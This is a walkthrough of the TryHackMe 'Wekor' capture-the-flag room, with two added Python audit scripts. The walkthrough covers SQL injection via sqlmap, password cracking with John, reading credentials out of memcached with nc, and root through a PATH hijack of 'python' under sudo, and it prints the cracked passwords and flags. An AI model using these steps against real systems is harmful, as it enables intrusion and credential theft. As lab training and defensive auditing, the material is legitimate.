Here is a write-up of this room!
ROOM LINK: https://tryhackme.com/room/wekorra
TRYHACKME PROFILE LINK: https://tryhackme.com/p/samueleex
Let's start right away with an Nmap scan:
┌──(user㉿parrot)-[/data/Wekor]
└─$ echo "10.10.207.93 wekor.thm" | sudo tee -a /etc/hosts
[sudo] password for kali:
10.10.207.93 wekor.thm
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 95:c3:ce:af:07:fa:e2:8e:29:04:e4:cd:14:6a:21:b5 (RSA)
| 256 4d:99:b5:68:af:bb:4e:66:ce:72:70:e6:e3:f8:96:a4 (ECDSA)
|_ 256 0d:e5:7d:e8:1a:12:c0:dd:b7:66:5e:98:34:55:59:f6 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 9 disallowed entries
| /workshop/ /root/ /lol/ /agent/ /feed /crawler /boot
|_/comingreallysoon /interesting
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can see that most of these pages return a 404 error, but we can still check each of them:
┌──(user㉿parrot)-[/data/Wekor]
└─$ for i in `curl -s http://wekor.thm/robots.txt | grep Disallow | cut -d " " -f2`;do echo $i;curl -I http://wekor.thm$i;echo "---";done
/workshop/
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:13 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1
---
/root/
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:13 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1
---
/lol/
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:13 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1
---
/agent/
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:13 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1
---
/feed
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:13 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1
---
/crawler
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1
---
/boot
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1
---
/comingreallysoon
HTTP/1.1 301 Moved Permanently
Date: Tue, 11 May 2021 16:27:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Location: http://wekor.thm/comingreallysoon/
Content-Type: text/html; charset=iso-8859-1
---
/interesting
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1
Indeed:
┌──(user㉿parrot)-[/data/Wekor]
└─$ curl -s http://wekor.thm/comingreallysoon/
Welcome Dear Client!
We've setup our latest website on /it-next, Please go check it out!
If you have any comments or suggestions, please tweet them to @faketwitteraccount!
Thanks a lot !
From the scans we can see that the it_cart.php page has a SQL injection vulnerability.
In this case we can capture the traffic with Burp Suite, save the POST request and use sqlmap to dump the database:
┌──(user㉿parrot)-[~/…/sqlmap/output/wekor.thm/dump]
└─$ ll
total 24
coupons
information_schema
mysql
performance_schema
sys
wordpress
Listing of the WordPress database:
┌──(user㉿parrot)-[~/…/sqlmap/output/wekor.thm/dump]
└─$ tree wordpress
wordpress
├── option_value-36999631.bin
├── post_content-15186792.bin
├── wp_comments.csv
├── wp_options.csv
├── wp_postmeta.csv
├── wp_posts.csv
├── wp_term_relationships.csv
├── wp_terms.csv
├── wp_term_taxonomy.csv
├── wp_usermeta.csv
└── wp_users.csv
┌──(user㉿parrot)-[~/…/output/wekor.thm/dump/wordpress]
└─$ cat wp_users.csv
We have now cracked all the passwords except the admin's (brute-force attempt):
┌──(user㉿parrot)-[/data/Wekor/files]
└─$ /data/src/john/run/john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 4 password hashes with 4 different salts (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
rockyou (wp_jeffrey)
xxxxxx (wp_eagle)
soccer13 (wp_yura)
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed
We now have the following information:
- admin: (password not yet obtained)
- wp_eagle: Subscriber
- wp_jeffrey: Subscriber
- wp_yura: Administrator
Now, the site http://site.wekor.thm/wordpress leads to a WordPress installation. Let's go to http://site.wekor.thm/wordpress/wp-admin/ and try the credentials found earlier. Trying the 3 accounts, we find that wp_yura has administrator privileges.
Let's try a reverse shell:
Let's run linpeas.sh:
[+] Active Ports
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:11211 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3010 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:631 :::* LISTEN -
Some services are listening only on localhost, one of them on port 11211 (memcached's default port).
Let's check whether we can dump the information stored in the cache:
www-data@osboxes:/$ echo "stats items" | nc -vn -w 1 127.0.0.1 11211
echo "stats items" | nc -vn -w 1 127.0.0.1 11211
Connection to 127.0.0.1 11211 port [tcp/*] succeeded!
STAT items:1:number 5
STAT items:1:age 1361
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 0
STAT items:1:lrutail_reflocked 0
END
www-data@osboxes:/$ echo "stats cachedump 1 0" | nc -vn -w 1 127.0.0.1 11211
echo "stats cachedump 1 0" | nc -vn -w 1 127.0.0.1 11211
Connection to 127.0.0.1 11211 port [tcp/*] succeeded!
ITEM id [4 b; 1620801753 s]
ITEM email [14 b; 1620801753 s]
ITEM salary [8 b; 1620801753 s]
ITEM password [15 b; 1620801753 s]
ITEM username [4 b; 1620801753 s]
END
www-data@osboxes:/$ echo "get username" | nc -vn -w 1 127.0.0.1 11211
echo "get username" | nc -vn -w 1 127.0.0.1 11211
Connection to 127.0.0.1 11211 port [tcp/*] succeeded!
VALUE username 0 4
Orka
END
www-data@osboxes:/$ echo "get password" | nc -vn -w 1 127.0.0.1 11211
echo "get password" | nc -vn -w 1 127.0.0.1 11211
Connection to 127.0.0.1 11211 port [tcp/*] succeeded!
VALUE password 0 15
OrkAiSC00L24/7$
END
We now have Orka's password: OrkAiSC00L24/7$
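A small parser for the memcached replies shown above, added here as an example (it is not part of the original write-up or of the room). It reads the `stats cachedump` and `get` responses of the memcached text protocol and flags key names that suggest credentials are being cached in plaintext, which is exactly the finding a defender would want to catch when auditing a cache. The key-name pattern and the value in the sample `get` reply are constructed for the example; the cachedump lines are the ones from the session above.

```python
import re

# Key names a defender would not expect to see in a cache. Assumption: this
# pattern list is illustrative, not exhaustive.
SENSITIVE_KEY = re.compile(r"pass|pwd|secret|token|session|auth|cookie", re.I)

# "ITEM <key> [<bytes> b; <expiry> s]" as printed by "stats cachedump <slab> <limit>"
ITEM_LINE = re.compile(r"^ITEM (\S+) \[(\d+) b; (\d+) s\]$")

# Sample output, copied from the cachedump in the write-up above.
SAMPLE_CACHEDUMP = """\
ITEM id [4 b; 1620801753 s]
ITEM email [14 b; 1620801753 s]
ITEM salary [8 b; 1620801753 s]
ITEM password [15 b; 1620801753 s]
ITEM username [4 b; 1620801753 s]
END
"""

# Constructed "get" reply; the value is a placeholder, not the real one.
SAMPLE_GET = "VALUE password 0 11\r\nplaceholder\r\nEND\r\n"


def parse_cachedump(text):
    """Return [(key, size_bytes, expiry_epoch), ...] from cachedump output.

    Parsing stops at the END sentinel; lines that do not match are ignored.
    """
    items = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "END":
            break
        m = ITEM_LINE.match(line)
        if m:
            items.append((m.group(1), int(m.group(2)), int(m.group(3))))
    return items


def sensitive_keys(items):
    """Keys from parse_cachedump() whose names look like secrets."""
    return [key for key, _, _ in items if SENSITIVE_KEY.search(key)]


def parse_get_response(text):
    """Parse 'VALUE <key> <flags> <bytes>\\r\\n<data>\\r\\nEND' into {key: data}.

    The data block is read by its declared byte length rather than by line,
    so values that contain newlines are handled correctly. A VALUE line from
    'gets' carries an extra cas field, which is simply ignored here.
    """
    data = text.encode()
    values = {}
    pos = 0
    while True:
        eol = data.index(b"\r\n", pos)
        header = data[pos:eol].decode()
        if header == "END":
            return values
        parts = header.split()
        if parts[0] != "VALUE" or len(parts) < 4:
            raise ValueError("unexpected line: %r" % header)
        key, nbytes = parts[1], int(parts[3])
        start = eol + 2
        end = start + nbytes
        values[key] = data[start:end].decode()
        pos = end + 2  # skip the \r\n that terminates the data block


if __name__ == "__main__":
    items = parse_cachedump(SAMPLE_CACHEDUMP)
    print("keys in slab:", [k for k, _, _ in items])
    print("keys that look like secrets:", sensitive_keys(items))
    print("parsed get reply:", parse_get_response(SAMPLE_GET))
```

Run against a real instance, the same functions would take the raw output of `echo "stats cachedump 1 0" | nc 127.0.0.1 11211`; any key the audit flags is a sign that the application is storing credentials in a store that has no authentication of its own.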
www-data@osboxes:/$ su Orka
su Orka
Password: OrkAiSC00L24/7$
Orka@osboxes:~$ cat /home/Orka/user.txt
1a26a6d51c0172400add0e297608dec6
Here is the user flag: 1a26a6d51c0172400add0e297608dec6
Now that we have the user flag, let's find the root flag!
Orka@osboxes:/$ cat > /usr/sbin/python << EOF
#!/bin/bash
/bin/bash
EOF
cat > /usr/sbin/python << EOF
> #!/bin/bash
> /bin/bash
> EOF
Orka@osboxes:/$ chmod +x /usr/sbin/python
chmod +x /usr/sbin/python
Orka@osboxes:/$ sudo /home/Orka/Desktop/bitcoin
sudo /home/Orka/Desktop/bitcoin
Enter the password : password
password
Access Granted...
User Manual:
Maximum Amount Of BitCoins Possible To Transfer at a time : 9
Amounts with more than one number will be stripped off!
And Lastly, be careful, everything is logged :)
Amount Of BitCoins : 20
20
root@osboxes:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@osboxes:/# cat /root/root.txt
cat /root/root.txt
f4e788f87cc3afaecbaf0f0fe9ae6ad7
Root flag: f4e788f87cc3afaecbaf0f0fe9ae6ad7
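The root step above works because the `bitcoin` binary, run through sudo, calls `python` by its bare name and a directory on the search path (`/usr/sbin`) was writable by Orka, so a fake `python` got picked up first. The following is an added example, not part of the original write-up or of the room: a small audit that lists the writable directories on a given PATH and reports which commands would resolve to a file living in one of them. The `demo()` function builds its own throwaway directory with an empty executable named `python`, so everything it reports is constructed and nothing outside the temp directory is touched. The standard mitigation is sudo's `secure_path` option in sudoers, which replaces the caller's PATH for every command run through sudo, together with keeping system directories non-writable.

```python
import os
import tempfile


def _entries(path):
    """Split a PATH-style string (default: the process $PATH) into its entries."""
    raw = path if path is not None else os.environ.get("PATH", "")
    # An empty entry in PATH means the current directory.
    return [d or "." for d in raw.split(os.pathsep)]


def writable_path_dirs(path=None):
    """Return the PATH entries that exist and that the current user can write to."""
    return [d for d in _entries(path)
            if os.path.isdir(d) and os.access(d, os.W_OK)]


def resolve_command(name, path=None):
    """Return the first executable file named `name` along `path`, or None.

    This mirrors the lookup a shell performs for a bare command name:
    the first matching directory wins, whatever comes later.
    """
    for d in _entries(path):
        candidate = os.path.join(d, name)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def shadowed_commands(names, path=None):
    """Commands from `names` whose first match sits in a writable directory.

    A hit means a local user could replace that program and have it run by
    anything (including a sudo rule) that calls it without a full path.
    """
    writable = set(writable_path_dirs(path))
    hits = []
    for name in names:
        target = resolve_command(name, path)
        if target is not None and os.path.dirname(target) in writable:
            hits.append(name)
    return hits


def demo():
    """Constructed scenario: a writable directory first on PATH holding 'python'."""
    with tempfile.TemporaryDirectory() as tmp:
        fake = os.path.join(tmp, "python")
        open(fake, "w").close()  # empty file; only its name and mode matter
        os.chmod(fake, 0o755)
        path = os.pathsep.join([tmp, "/usr/bin", "/bin"])
        return {
            "writable": tmp in writable_path_dirs(path),
            "resolved_in_tmp": resolve_command("python", path) == fake,
            "shadowed": shadowed_commands(["python"], path),
        }


if __name__ == "__main__":
    # Audit the real environment first, then show the constructed scenario.
    print("writable dirs on $PATH:", writable_path_dirs())
    print("shadowable interpreters:", shadowed_commands(["python", "python3", "sh"]))
    print("constructed scenario:", demo())
```

On a correctly configured host `writable_path_dirs()` should return nothing for an unprivileged user; when run as root it will list every existing entry, since root can write anywhere, so the audit is meaningful for the account that would actually invoke the sudo rule.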